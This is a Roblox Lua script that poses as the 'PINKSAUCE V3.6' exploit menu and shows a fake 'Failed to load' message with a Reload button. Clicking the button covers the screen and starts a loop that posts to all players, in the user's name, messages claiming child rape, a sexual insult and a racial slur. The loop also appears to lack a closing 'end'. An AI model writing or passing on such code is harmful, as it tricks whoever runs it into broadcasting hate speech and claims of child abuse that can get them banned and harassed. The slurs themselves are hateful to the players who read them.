-- Gui to Lua
-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local PinkSauce = Instance.new("TextLabel")
local Top = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")
local Btn = Instance.new("TextButton")
local TextLabel_2 = Instance.new("TextLabel")

--Properties:

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(54, 54, 54)
Frame.Position = UDim2.new(0.146171689, 0, 0.144554451, 0)
Frame.Size = UDim2.new(0, 610, 0, 358)

PinkSauce.Name = "PinkSauce"
PinkSauce.Parent = ScreenGui
PinkSauce.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
PinkSauce.BackgroundTransparency = 1.000
PinkSauce.Position = UDim2.new(0.383990735, 0, 0.182178214, 0)
PinkSauce.Size = UDim2.new(0, 200, 0, 50)
PinkSauce.Font = Enum.Font.PermanentMarker
PinkSauce.Text = "PINKSAUCE"
PinkSauce.TextColor3 = Color3.fromRGB(238, 0, 255)
PinkSauce.TextSize = 30.000

Top.Name = "Top"
Top.Parent = ScreenGui
Top.BackgroundColor3 = Color3.fromRGB(255, 0, 251)
Top.Position = UDim2.new(0.145999998, 0, 0.14301981, 0)
Top.Size = UDim2.new(0, 610, 0, 25)

TextLabel.Parent = ScreenGui
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Position = UDim2.new(0.132250592, 0, 0.11683166, 0)
TextLabel.Size = UDim2.new(0, 200, 0, 50)
TextLabel.Font = Enum.Font.Code
TextLabel.Text = "PINKSAUCE V3.6"
TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.TextSize = 20.000

Btn.Name = "Btn"
Btn.Parent = ScreenGui
Btn.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Btn.BackgroundTransparency = 0.750
Btn.BorderColor3 = Color3.fromRGB(255, 0, 255)
Btn.Position = UDim2.new(0.383990735, 0, 0.491089106, 0)
Btn.Size = UDim2.new(0, 200, 0, 50)
Btn.Font = Enum.Font.Kalam
Btn.Text = "Reload"
Btn.TextColor3 = Color3.fromRGB(255, 0, 251)
Btn.TextSize = 50.000

TextLabel_2.Parent = ScreenGui
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.Position = UDim2.new(0.383990705, 0, 0.336633682, 0)
TextLabel_2.Size = UDim2.new(0, 200, 0, 50)
TextLabel_2.Font = Enum.Font.Kalam
TextLabel_2.Text = "Failed to load! Click \"Reload\"  to reload"
TextLabel_2.TextColor3 = Color3.fromRGB(247, 0, 255)
TextLabel_2.TextSize = 50.000

-- Scripts:

local function BOYEI_fake_script() -- Btn.LocalScript 
	local script = Instance.new('LocalScript', Btn)

	Btn.MouseButton1Click:connect(function()
		local Screen = Instance.new("ScreenGui")
		local main = Instance.new("Frame")
	
		--Properties:
	
		Screen.Parent = game.CoreGui
	
		main.Name = "main"
		main.Parent = Screen
		main.BackgroundColor3 = Color3.fromRGB(255, 0, 255)
		main.Position = UDim2.new(-10, 0, -10, 0)
		main.Size = UDim2.new(9999, 9999, 9999, 9999)
		main.Active = true
		local inf = 0
		while inf == 0 do
			local args = {[1] = "i fuck kids",[2] = "All"}
			game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(args))
			wait(0.5)
			local args = {[1] = "i rape children",[2] = "All"}
			game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(args))
			wait(0.5)
			local args = {[1] = "suck my cock gay twat",[2] = "All"}
			game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(args))
			wait(0.5)
			local args = {[1] = "u little nigger",[2] = "All"}
			game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(args))
	end)
end
coroutine.wrap(BOYEI_fake_script)()
